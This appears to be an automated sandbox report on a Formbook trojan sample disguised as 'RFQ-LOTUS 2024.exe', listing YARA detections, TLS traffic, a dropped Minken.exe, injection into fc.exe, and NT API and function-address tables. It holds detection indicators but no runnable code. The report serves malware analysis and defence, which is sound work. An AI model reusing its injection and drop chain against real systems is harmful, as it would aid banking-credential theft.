Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.31.110:443 -> 192.168.2.4:49755 version: TLS 1.2

E-Banking Fraud

Source: Yara match	File source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: initial sample

Static PE information: Filename: RFQ-LOTUS 2024.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\Minken.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231935C0 NtCreateMutant,LdrInitializeThunk,		12_2_231935C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192DF0 NtQuerySystemInformation,LdrInitializeThunk,		12_2_23192DF0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192C70 NtFreeVirtualMemory,LdrInitializeThunk,		12_2_23192C70
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23194340 NtSetContextThread,		12_2_23194340
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23193010 NtOpenDirectoryObject,		12_2_23193010
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23193090 NtSetValueKey,		12_2_23193090
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23194650 NtSuspendThread,		12_2_23194650
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23192B60 NtClose,		12_2_23192B60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA4340 NtSetContextThread,LdrInitializeThunk,		18_2_02CA4340
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA4650 NtSuspendThread,LdrInitializeThunk,		18_2_02CA4650
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA35C0 NtCreateMutant,LdrInitializeThunk,		18_2_02CA35C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2AD0 NtReadFile,LdrInitializeThunk,		18_2_02CA2AD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2AF0 NtWriteFile,LdrInitializeThunk,		18_2_02CA2AF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2BE0 NtQueryValueKey,LdrInitializeThunk,		18_2_02CA2BE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,		18_2_02CA2BF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2BA0 NtEnumerateValueKey,LdrInitializeThunk,		18_2_02CA2BA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2B60 NtClose,LdrInitializeThunk,		18_2_02CA2B60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA39B0 NtGetContextThread,LdrInitializeThunk,		18_2_02CA39B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2EE0 NtQueueApcThread,LdrInitializeThunk,		18_2_02CA2EE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2E80 NtReadVirtualMemory,LdrInitializeThunk,		18_2_02CA2E80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2FE0 NtCreateFile,LdrInitializeThunk,		18_2_02CA2FE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2FB0 NtResumeThread,LdrInitializeThunk,		18_2_02CA2FB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2F30 NtCreateSection,LdrInitializeThunk,		18_2_02CA2F30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2CA0 NtQueryInformationToken,LdrInitializeThunk,		18_2_02CA2CA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2C60 NtCreateKey,LdrInitializeThunk,		18_2_02CA2C60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2C70 NtFreeVirtualMemory,LdrInitializeThunk,		18_2_02CA2C70
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2DD0 NtDelayExecution,LdrInitializeThunk,		18_2_02CA2DD0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2DF0 NtQuerySystemInformation,LdrInitializeThunk,		18_2_02CA2DF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2D10 NtMapViewOfSection,LdrInitializeThunk,		18_2_02CA2D10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2D30 NtUnmapViewOfSection,LdrInitializeThunk,		18_2_02CA2D30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA3090 NtSetValueKey,		18_2_02CA3090
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA3010 NtOpenDirectoryObject,		18_2_02CA3010
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2AB0 NtWaitForSingleObject,		18_2_02CA2AB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2B80 NtQueryInformationFile,		18_2_02CA2B80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2EA0 NtAdjustPrivilegesToken,		18_2_02CA2EA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2E30 NtWriteVirtualMemory,		18_2_02CA2E30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2F90 NtProtectVirtualMemory,		18_2_02CA2F90
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2FA0 NtQuerySection,		18_2_02CA2FA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2F60 NtCreateProcessEx,		18_2_02CA2F60
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2CC0 NtQueryVirtualMemory,		18_2_02CA2CC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2CF0 NtOpenProcess,		18_2_02CA2CF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2C00 NtQueryInformationProcess,		18_2_02CA2C00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2DB0 NtEnumerateKey,		18_2_02CA2DB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA3D70 NtOpenThread,		18_2_02CA3D70
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA2D00 NtSetInformationFile,		18_2_02CA2D00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA3D10 NtOpenProcessToken,		18_2_02CA3D10
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00137480 NtCreateFile,		18_2_00137480
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001375E0 NtReadFile,		18_2_001375E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001376D0 NtDeleteFile,		18_2_001376D0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00137760 NtClose,		18_2_00137760
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001378C0 NtAllocateVirtualMemory,		18_2_001378C0

Source: C:\Users\user\Desktop\RFQ-LOTUS 2024.exe

Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040327D

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DDEFF8		1_2_04DDEFF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04DDECB0		1_2_04DDECB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_089A0040		1_2_089A0040
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321132D		12_2_2321132D
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314D34C		12_2_2314D34C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321A352		12_2_2321A352
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231A739A		12_2_231A739A
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232203E6		12_2_232203E6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316E3F0		12_2_2316E3F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23200274		12_2_23200274
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231652A0		12_2_231652A0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232012ED		12_2_232012ED
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317B2C0		12_2_2317B2C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E02C0		12_2_231E02C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317D2F0		12_2_2317D2F0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FA118		12_2_231FA118
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23150100		12_2_23150100
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231E8158		12_2_231E8158
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2322B16B		12_2_2322B16B
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2314F172		12_2_2314F172
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2319516C		12_2_2319516C
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232201AA		12_2_232201AA
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2316B1B0		12_2_2316B1B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232181CC		12_2_232181CC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321F0E0		12_2_2321F0E0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232170E9		12_2_232170E9
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231670C0		12_2_231670C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320F0CC		12_2_2320F0CC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23184750		12_2_23184750
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160770		12_2_23160770
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321F7B0		12_2_2321F7B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2315C7C0		12_2_2315C7C0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_232116CC		12_2_232116CC
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2317C6E0		12_2_2317C6E0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23160535		12_2_23160535
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23217571		12_2_23217571
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_231FD5B0		12_2_231FD5B0
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23220591		12_2_23220591
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321F43F		12_2_2321F43F
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23212446		12_2_23212446
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_23151460		12_2_23151460
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2320E4F6		12_2_2320E4F6
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321FB76		12_2_2321FB76
Source: C:\Users\user\AppData\Local\Temp\Minken.exe	Code function: 12_2_2321AB40		12_2_2321AB40
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216F21B		17_2_0216F21B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216D29B		17_2_0216D29B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216412C		17_2_0216412C
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0218C95B		17_2_0218C95B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0217597B		17_2_0217597B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02173E1B		17_2_02173E1B
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_02163F2F		17_2_02163F2F
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216EFF3		17_2_0216EFF3
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_0216EFFB		17_2_0216EFFB
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D71D47		17_2_04D71D47
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D5AD67		17_2_04D5AD67
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D49518		17_2_04D49518
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D52687		17_2_04D52687
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D54607		17_2_04D54607
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D543DF		17_2_04D543DF
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D543E7		17_2_04D543E7
Source: C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe	Code function: 17_2_04D4931B		17_2_04D4931B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8B2C0		18_2_02C8B2C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CF02C0		18_2_02CF02C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8D2F0		18_2_02C8D2F0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D112ED		18_2_02D112ED
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C752A0		18_2_02C752A0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D10274		18_2_02D10274
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D303E6		18_2_02D303E6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C7E3F0		18_2_02C7E3F0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CB739A		18_2_02CB739A
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2A352		18_2_02D2A352
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C5D34C		18_2_02C5D34C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2132D		18_2_02D2132D
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C770C0		18_2_02C770C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D1F0CC		18_2_02D1F0CC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2F0E0		18_2_02D2F0E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D270E9		18_2_02D270E9
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D281CC		18_2_02D281CC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C7B1B0		18_2_02C7B1B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D301AA		18_2_02D301AA
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CF8158		18_2_02CF8158
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CA516C		18_2_02CA516C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C5F172		18_2_02C5F172
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D3B16B		18_2_02D3B16B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C60100		18_2_02C60100
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D0A118		18_2_02D0A118
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D216CC		18_2_02D216CC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8C6E0		18_2_02C8C6E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C6C7C0		18_2_02C6C7C0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2F7B0		18_2_02D2F7B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C94750		18_2_02C94750
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C70770		18_2_02C70770
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D1E4F6		18_2_02D1E4F6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D22446		18_2_02D22446
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C61460		18_2_02C61460
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2F43F		18_2_02D2F43F
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D30591		18_2_02D30591
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D0D5B0		18_2_02D0D5B0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D27571		18_2_02D27571
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C70535		18_2_02C70535
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D1DAC6		18_2_02D1DAC6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C6EA80		18_2_02C6EA80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CB5AA0		18_2_02CB5AA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D0DAAC		18_2_02D0DAAC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D27A46		18_2_02D27A46
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FA49		18_2_02D2FA49
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CE3A6C		18_2_02CE3A6C
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D26BD7		18_2_02D26BD7
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CADBF9		18_2_02CADBF9
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CE5BF0		18_2_02CE5BF0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8FB80		18_2_02C8FB80
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2AB40		18_2_02D2AB40
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FB76		18_2_02D2FB76
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C738E0		18_2_02C738E0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C9E8F0		18_2_02C9E8F0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C568B8		18_2_02C568B8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C72840		18_2_02C72840
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C7A840		18_2_02C7A840
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CDD800		18_2_02CDD800
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C729A0		18_2_02C729A0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D3A9A6		18_2_02D3A9A6
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C79950		18_2_02C79950
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8B950		18_2_02C8B950
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C86962		18_2_02C86962
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2EEDB		18_2_02D2EEDB
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2CE93		18_2_02D2CE93
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C82E90		18_2_02C82E90
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C79EB0		18_2_02C79EB0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C70E59		18_2_02C70E59
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2EE26		18_2_02D2EE26
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C62FC8		18_2_02C62FC8
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C71F92		18_2_02C71F92
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FFB1		18_2_02D2FFB1
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CEEFA0		18_2_02CEEFA0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CE4F40		18_2_02CE4F40
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FF09		18_2_02D2FF09
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CB2F28		18_2_02CB2F28
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C90F30		18_2_02C90F30
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D2FCF2		18_2_02D2FCF2
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C60CF2		18_2_02C60CF2
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D10CB5		18_2_02D10CB5
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C70C00		18_2_02C70C00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02CE9C32		18_2_02CE9C32
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C8FDC0		18_2_02C8FDC0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C6ADE0		18_2_02C6ADE0
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C88DBF		18_2_02C88DBF
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C73D40		18_2_02C73D40
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D21D5A		18_2_02D21D5A
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02D27D73		18_2_02D27D73
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_02C7AD00		18_2_02C7AD00
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_00121090		18_2_00121090
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001111A4		18_2_001111A4
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0011C270		18_2_0011C270
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0011C268		18_2_0011C268
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_001113A1		18_2_001113A1
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0011C490		18_2_0011C490
Source: C:\Windows\SysWOW64\fc.exe	Code function: 18_2_0011A510		18_2_0011A510
